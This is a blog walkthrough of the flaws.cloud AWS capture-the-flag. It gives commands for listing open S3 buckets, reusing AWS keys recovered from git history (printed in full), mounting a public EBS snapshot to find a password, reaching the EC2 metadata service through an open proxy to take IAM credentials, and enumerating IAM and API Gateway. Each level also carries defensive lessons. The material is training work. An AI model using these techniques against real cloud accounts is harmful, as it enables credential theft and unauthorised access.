Hacking AWS[Flaws.cloud Walkthrough]

KISHORERAM
18 min readJan 20, 2024

--

Flaws.cloud is an interactive platform created by Scott Piper of Summit Route, serving as an educational tool for Amazon Web Services (AWS) security concepts. Designed as a Capture The Flag (CTF) challenge, it offers an engaging and fun way to learn the basics of AWS security. The platform includes challenges and tutorials to enhance participants’ understanding of AWS security, covering topics like misconfigurations and defensive analysis.

http://flaws.cloud/

Level 1 [buckets of fun]

The site flaws.cloud is hosted as an S3 bucket. This is a great way to host a static site, similar to hosting one via GitHub pages. Some interesting facts about S3 hosting: When hosting a site as an S3 bucket, the bucket name (flaws.cloud) must match the domain name (flaws.cloud). Also, S3 buckets are a global name space, meaning two people cannot have buckets with the same name. The result of this is you could create a bucket named apple.com and Apple would never be able host their main site via S3 hosting.

You can determine the site is hosted as an S3 bucket by running a DNS lookup on the domain:

dig flaws.cloud

;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.180.194
flaws.cloud. 5 IN A 52.218.236.210
flaws.cloud. 5 IN A 52.92.240.107
flaws.cloud. 5 IN A 52.92.188.219
flaws.cloud. 5 IN A 52.92.225.107
flaws.cloud. 5 IN A 52.92.165.11
flaws.cloud. 5 IN A 52.92.235.67
flaws.cloud. 5 IN A 52.92.132.219
nslookup flaws.cloud

Server: 192.168.33.253
Address: 192.168.33.253#53

Non-authoritative answer:
Name: flaws.cloud
Address: 52.218.234.26
Name: flaws.cloud
Address: 52.92.179.171
Name: flaws.cloud
Address: 52.92.249.147
host 52.218.234.26
flaws.cloud has address 52.218.178.219
flaws.cloud has address 52.92.130.83
flaws.cloud has address 52.92.187.155
flaws.cloud has address 52.218.178.171
flaws.cloud has address 52.92.161.67
flaws.cloud has address 52.218.217.18
flaws.cloud has address 52.218.236.18
flaws.cloud has address 52.218.244.74
dig +short -x 52.218.234.26
s3-website-us-west-2.amazonaws.com.

s3 bucket discovered at s3-website-us-west-2.amazonaws.com

S3 Bucket address translation http://flaws.cloud.s3-website-us-west-2.amazonaws.com/

AWS SETUP

we need to interact with AWS Resources for that we need to use AWS CLI , I installed it on my kali Linux and also installed Terraform which will be useful later.

Install AWS CLI

curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install

Check the version

aws --version

Install Terraform

Terraform is a software tool that allows engineers to define and manage their software infrastructure using code. It’s an Infrastructure as Code (IaC) tool that provides a consistent command line interface (CLI) workflow to manage hundreds of cloud services.

sudo apt install terraform
Installed size: 77.16 MB

Check if it is installed

terraform -h

Once AWS is installed we need to configure it for that you need to sign up and create an AWS Account (Free tier account is available). After you created an account you need to get access key and secret access key. For region you can select as us-west-2 since flaws is hosted in that region. You can create a profile in aws configure to manage all your configuration and it will be useful while destroying the resources when created.

aws configure --profile Profilename

If you happened to not know the region, there are only a dozen regions to try. You could also use the GUI tool cyberduck to browse this bucket and it will figure out the region automatically.

S3 is used for accessing the S3 bucket and ls is used to list the list the contents of the flaws.cloud bucket and region is set as us-west-2 and no sign request flag if we don’t have the credentials to authenticate our s3 API calls (No AWS Account configured) and you can try without credentials by telling the CLI not to sign the request or look for credentials. Lets look at the secret file in the browser.

http://s3.amazonaws.com/[bucket_name]/
http://[bucket_name].s3.amazonaws.com/

Lesson learned[From flaws.cloud]

On AWS you can set up S3 buckets with all sorts of permissions and functionality including using them to host static files. A number of people accidentally open them up with permissions that are too loose. Just like how you shouldn’t allow directory listings of web servers, you shouldn’t allow bucket listings.

Avoiding the mistake[From flaws.cloud]

By default, S3 buckets are private and secure when they are created. To allow it to be accessed as a web page, I had turn on “Static Website Hosting” and changed the bucket policy to allow everyone “s3:GetObject” privileges, which is fine if you plan to publicly host the bucket as a web page. But then to introduce the flaw, they changed the permissions to add “Everyone” to have “List” permissions.

“Everyone” means everyone on the Internet. You can also list the files simply by going to http://flaws.cloud Similar to opening permissions to “Everyone”, people accidentally open permissions to “Any Authenticated AWS User”. They might mistakenly think this will only be users of their account, when in fact it means anyone has an AWS account due to that List permission.

Level 2

The next level is fairly similar, with a slight twist. You’re going to need your own AWS account for this. You just need the free tier. http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/

I got another secret file by using same command as authenticated AWS User.

Lesson learned[From flaws.cloud]

Similar to opening permissions to “Everyone”, people accidentally open permissions to “Any Authenticated AWS User”. They might mistakenly think this will only be users of their account, when in fact it means anyone that has an AWS account.

Avoiding the mistake[From flaws.cloud]

Only open permissions to specific AWS users.

This screenshot is from the webconsole in 2017. This setting can no longer be set in the webconsole, but the SDK and third-party tools sometimes allow it. For example

aws s3api put-bucket-acl --bucket bucketname --acl authenticated-read
aws s3api put-object-acl --bucket bucketname --key file--acl authenticated-read

Level 3

The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you’ll find something that will let you list what other buckets are. http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

Bucket contains git config file and downloading entire s3 bucket locally

aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2

Inspecting git log

It has a comment of accident commit and lets checkout that git commit

git checkout b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
+access_key AKIAJ366LIPB4IJKT7SA
+secret_access_key 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

By using the AWS access key and secret access key. I configured new profile flaws and used it to list s3 buckets

Now we can see the level-4,5,6 and final level buckets and lets note down the bucket url

level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud

Lesson learned[From flaws.cloud]

People often leak AWS keys and then try to cover up their mistakes without revoking the keys. You should always revoke any AWS keys (or any secrets) that could have been leaked or were misplaced. Roll your secrets early and often.Similarly, be aware that buckets use a global namespace meaning that bucket names must be unique across all customers, so if you create a bucket named`merger_with_company_Y` or something that is supposed to be secret, it’s technically possible for someone to discover that bucket exists.

Avoiding this mistake[From flaws.cloud]

Always roll your secrets if you suspect they were compromised or made public or stored or shared incorrectly. Roll early, roll often. Rolling secrets means that you revoke the keys (ie. delete them from the AWS account) and generate new ones.

Level 4

For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloudIt’ll be useful to know that a snapshot was made of that EC2 shortly after nginx was setup on it.

we need to access the web page hosted on an EC2 Instance. If we click on the link we will be asked for credentials for that need to find a way to get the credentials. we need to do enumeration of the user we have found and using STS(Security Token Service) which handles security controls of various AWS accounts. The AWS STS GetCallerIdentity API provides information about the account that will be affected by the next API call. It also returns the 12-digit identification number of the AWS account. The command aws sts get-caller-identity also displays the user ID, account ID, and user ARN. The get-caller-identity command returns details about the IAM user or role whose credentials are used to call the operation. No permissions are required to perform this operation.An Amazon Resource Name (ARN) is a unique string of characters that identifies an AWS resource. ARNs are used to identify resources such as users, EC2 services, S3 buckets, and lambda functions.

aws sts get-caller-identity --profile flawslevel3

we can notice that our user is called backup in the iam.

we identified account ID using aws --profile flawslevel3 sts get-caller-identity Account id: 975426262029. we need to add us-west-2 region to ~/.aws/config .we can see all the snapshots associated with this user using describe-snapshots By default snapshots are private, and you can transfer them between accounts securely by specifying the account ID of the other account, but a number of people just make them public and forget about them it seems.

we can check the permissions on this snapshot with aws ec2 describe-snapshot-attribute — snapshot-id snap-0b49342abd1bdcb89 — attribute createVolumePermission — profile flawslevel3

We can see that anyone can create a volume based on this snapshot Now that we have the snapshot, we’ll wan to mount it and see what’s in it. You can read this article to create the volume and attach it to EC2 in GUI https://ec2-tutorials.readthedocs.io/en/latest/volumes-and-snapshots.html .To create an EC2 volume for us-west-2 with the snapshot-id of the public EC2 snapshot we found earlier. Now that you know the snapshot ID, you’re going to want to mount it. You’ll need to do this in your own AWS account. First, create a volume using the snapshot :aws ec2 create-volume — availability-zone us-west-2a --region us-west-2 — snapshot-id snap-0b49342abd1bdcb89 .We can verify that it worked by using: aws ec2 describe-volumes --region us-west-2 and seeing the volume listed. After that we need to use the AWS web console to create an EC2. Go onto the portal and hit the create a VM with EC2 button. In the URL I was sent to us-east-2, so i just changed that to us-west-2 in the URL, since our volume is available there. We should just be able to create any EC2 volume, so lets go for an Ubuntu image. After it is created we will SSH in and manually mount our volume (or)add a volume, and specify that SnapshotId.At this point you should be able to run both these commands and see output: aws ec2 describe-instances — region us-west-2 aws ec2 describe-volumes — region us-west-2 we should be able to attach the volume to the instance with the following: aws ec2 attach-volume — volume-id vol-randnum— instance-id i-randnum — device /dev/sdf — region us-west-2 The volume ID and instance is unique to you and make sure volume and instance in same region (us-west-2)

Download the key pair and SSH into it. change the permission of downloaded pem file. ssh -i YOUR_KEY.pem ubuntu@ec2-54-191-240-80.us-west-2.compute.amazonaws.com

First list information about all available block devices using lsblk. xvda1 is our available volume.
view drive information: sudo file -s /dev/xvdf1
Mount drive: sudo mount /dev/xvdf1 /mnt

Discover interesting file within the /home/ubuntu a file containing cleartext password is discovered: setupNginx.sh

Login to web service:
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/ utilizing discovered credentials and we gained access to level 5.
flaws:nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Lesson learned[From flaws.cloud]

AWS allows you to make snapshots of EC2’s and databases (RDS). The main purpose for that is to make backups, but people sometimes use snapshots to get access back to their own EC2’s when they forget the passwords. This also allows attackers to get access to things. Snapshots are normally restricted to your own account, so a possible attack would be an attacker getting access to an AWS key that allows them to start/stop and do other things with EC2’s and then uses that to snapshot an EC2 and spin up an EC2 with that volume in your environment to get access to it. Like all backups, you need to be cautious about protecting them.

Level 5

This EC2 has a simple HTTP only proxy on it. Here are some examples of it’s usage:

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/flaws.cloud/
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/summitroute.com/blog/feed.xml
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/neverssl.com/

See if you can use this proxy to figure out how to list the contents of the level6 bucket at
level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud that has a hidden directory in it.

We can see the configuration of this proxy in etc/nginx/sites-available/default:

location  ~* ^/proxy/((?U).+)/(.*)$ {
limit_except GET {
deny all;
}
limit_req zone=one burst=1;
set $proxyhost '$1';
set $proxyuri '$2';
proxy_limit_rate 4096;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $proxyhost;
resolver 8.8.8.8;
proxy_pass http://$proxyhost/$proxyuri;
}

This is similar to the capital one hack in which it has misconfigured firewall and proxy running on EC2 instance and we can use it to retrieve the credentials while using the IMDS in EC2 . You can read more about in my another story. https://kishoreramk.medium.com/securing-aws-understanding-ec2-imds-vulnerabilities-and-learning-from-the-capital-one-breach-6f753e06cd66

Let’s use the metadata service to see the instances metadata.

curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/

After navigating into this and we can find iam which is pretty interesting and we can dig deeper for any information.

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/info
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

We can find the access key and secret access key and lets create a profile using this and also there is security token present which might be an s3 bucket.

Addding session token in ~/.aws/credentials
nano ~/.aws/credentials
aws_session_token = ..

We can see there a directory of ddcc78ff, so lets go to the following URL.

http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/

Lesson learned[From flaws.cloud]

The IP address 169.254.169.254 is a magic IP in the cloud world. AWS, Azure, Google, DigitalOcean and others use this to allow cloud resources to find out metadata about themselves. Some, such as Google, have additional constraints on the requests, such as requiring it to use `Metadata-Flavor: Google` as an HTTP header and refusing requests with an `X-Forwarded-For` header. AWS has recently created a new IMDSv2 that requires special headers, a challenge and response, and other protections, but many AWS accounts may not have enforced it. If you can make any sort of HTTP request from an EC2 to that IP, you’ll likely get back information the owner would prefer you not see.

Avoiding this mistake[From flaws.cloud]

Ensure your applications do not allow access to 169.254.169.254 or any local and private IP ranges. Additionally, ensure that IAM roles are restricted as much as possible.

Level 6

For this final challenge, you’re getting a user access key that has the SecurityAudit policy attached to it. See what else it can do and what else you might find in this AWS account.

Access key ID: AKIAJFQ6E7BY57Q3OBGA
Secret: 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

Now Lets look what is SecurityAudit policy in aws documentation. The security audit template grants access to read security configuration metadata. It is useful for software that audits the configuration of an AWS account. https://docs.aws.amazon.com/aws-managed-policy/latest/reference/SecurityAudit.html

List of IAM Commands https://docs.aws.amazon.com/cli/latest/reference/iam/

IAM Enumeration :
The iam get-user command retrieves information about a specified IAM user. This information includes the user's: Creation date, Path, Unique ID, ARN.

List attached-user-policies attached to user

List-users

List policies attached to user

We can see some Lambda execution policies, so lets try look around from some Lambda functions. AWS Lambda is a serverless, event-driven computing service from Amazon Web Services. It allows developers to run code for any type of application or backend service without managing servers. AWS Lambda can be triggered from over 200 AWS services and SaaS applications, and users only pay for what they use. This is sometimes referred to as function-as-a-service (FaaS).

Now you know that you have two policies attached:

  • SecurityAudit”: This is an AWS policies you can look up either in your console or here
  • list_apigateways”: This is a custom Policy

Once you know the ARN for the policy you can get it’s version id:

Now that you have the ARN and the version id, you can see what the actual policy is

This tells us using this policy we can call “apigateway:GET” on “arn:aws:apigateway:us-west-2::/restapis/*

Amazon API Gateway is a fully managed service that makes it easy for developers to create, publish, maintain, monitor, and secure APIs at any scale. APIs act as the “front door” for applications to access data, business logic, or functionality from your backend services.

The API gateway in this case is used to call a lambda function, but you need to figure out how to invoke it.

The SecurityAudit policy lets you see some things about lambdas.

That tells you there is a function named “Level6”, and the SecurityAudit also lets you run.

You can create a web API with an HTTP endpoint for your Lambda function by using Amazon API Gateway. API Gateway provides tools for creating and documenting web APIs that route HTTP requests to Lambda functions. You can secure access to your API with authentication and authorization controls. Your APIs can serve traffic over the internet or can be accessible only within your VPC.

This tells you about the ability to execute `arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\` That “s33ppypa75” is a rest-api-id, which you can then use with that other attached policy
https://api-id.execute-api.us-east-2.amazonaws.com This is the format of HTTP API where api-id is s33ppypa75

aws --profile level6 --region us-west-2 apigateway get-gateway-responses  --rest-api-id "s33ppypa75"

{
"items": [
{
"responseType": "INTEGRATION_FAILURE",
"statusCode": "504",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "RESOURCE_NOT_FOUND",
"statusCode": "404",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "REQUEST_TOO_LARGE",
"statusCode": "413",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "THROTTLED",
"statusCode": "429",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "UNSUPPORTED_MEDIA_TYPE",
"statusCode": "415",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "AUTHORIZER_CONFIGURATION_ERROR",
"statusCode": "500",
"responseParameters": {},
:...skipping...
{
"items": [
{
"responseType": "INTEGRATION_FAILURE",
"statusCode": "504",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "RESOURCE_NOT_FOUND",
"statusCode": "404",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "REQUEST_TOO_LARGE",
"statusCode": "413",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "THROTTLED",
"statusCode": "429",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "UNSUPPORTED_MEDIA_TYPE",
"statusCode": "415",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "AUTHORIZER_CONFIGURATION_ERROR",
"statusCode": "500",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "DEFAULT_5XX",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "DEFAULT_4XX",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "BAD_REQUEST_PARAMETERS",
"statusCode": "400",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "BAD_REQUEST_BODY",
"statusCode": "400",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "WAF_FILTERED",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
{
"responseType": "EXPIRED_TOKEN",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "ACCESS_DENIED",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "INVALID_API_KEY",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "UNAUTHORIZED",
"statusCode": "401",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "API_CONFIGURATION_ERROR",
"statusCode": "500",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "QUOTA_EXCEEDED",
"statusCode": "429",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
{
"responseType": "INTEGRATION_TIMEOUT",
"statusCode": "504",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "MISSING_AUTHENTICATION_TOKEN",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "INVALID_SIGNATURE",
"statusCode": "403",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
},
{
"responseType": "AUTHORIZER_FAILURE",
"statusCode": "500",
"responseParameters": {},
"responseTemplates": {
"application/json": "{\"message\":$context.error.messageString}"
},
"defaultResponse": true
}
]
}

These are the Gateway-responses for this api-gateway.

create-api-key                           | create-authorizer                       
create-base-path-mapping | create-deployment
create-documentation-part | create-documentation-version
create-domain-name | create-model
create-request-validator | create-resource
create-rest-api | create-stage
create-usage-plan | create-usage-plan-key
create-vpc-link | delete-api-key
delete-authorizer | delete-base-path-mapping
delete-client-certificate | delete-deployment
delete-documentation-part | delete-documentation-version
delete-domain-name | delete-gateway-response
delete-integration | delete-integration-response
delete-method | delete-method-response
delete-model | delete-request-validator
delete-resource | delete-rest-api
delete-stage | delete-usage-plan
delete-usage-plan-key | delete-vpc-link
flush-stage-authorizers-cache | flush-stage-cache
generate-client-certificate | get-account
get-api-key | get-api-keys
get-authorizer | get-authorizers
get-base-path-mapping | get-base-path-mappings
get-client-certificate | get-client-certificates
get-deployment | get-deployments
get-documentation-part | get-documentation-parts
get-documentation-version | get-documentation-versions
get-domain-name | get-domain-names
get-export | get-gateway-response
get-gateway-responses | get-integration
get-integration-response | get-method
get-method-response | get-model
get-model-template | get-models
get-request-validator | get-request-validators
get-resource | get-resources
get-rest-api | get-rest-apis
get-sdk | get-sdk-type
get-sdk-types | get-stage
get-stages | get-tags
get-usage | get-usage-plan
get-usage-plan-key | get-usage-plan-keys
get-usage-plans | get-vpc-link
get-vpc-links | import-api-keys
import-documentation-parts | import-rest-api
put-gateway-response | put-integration
put-integration-response | put-method
put-method-response | put-rest-api
tag-resource | test-invoke-authorizer
test-invoke-method | untag-resource
update-account | update-api-key
update-authorizer | update-base-path-mapping
update-client-certificate | update-deployment
update-documentation-part | update-documentation-version
update-domain-name | update-gateway-response
update-integration | update-integration-response
update-method | update-method-response
update-model | update-request-validator
update-resource | update-rest-api
update-stage | update-usage
update-usage-plan | update-vpc-link

That tells you the stage name is “Prod”. Lambda functions are called using that rest-api-id, stage name, region, and resource as https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

Lesson learned[From flaws.cloud]

It is common to give people and entities read-only permissions such as the SecurityAudit policy. The ability to read your own and other’s IAM policies can really help an attacker figure out what exists in your environment and look for weaknesses and mistakes.

Avoiding this mistake[From flaws.cloud]

Don’t hand out any permissions liberally, even permissions that only let you read meta-data or know what your permissions are.

Photo by Matt Botsford on Unsplash

Thanks For Reading :)

Don’t miss out on my upcoming articles! Follow me on Medium for more insightful content. Clap and share this article to spread the knowledge among fellow bug bounty hunters and cybersecurity enthusiasts.

If you have any further questions or would like to connect, feel free to reach out to me.

My LinkedIn handle: https://www.linkedin.com/in/kishoreram-k/

--

--

KISHORERAM

Cybersecurity & Networking enthusiast | Avid learner| Looking for opportunities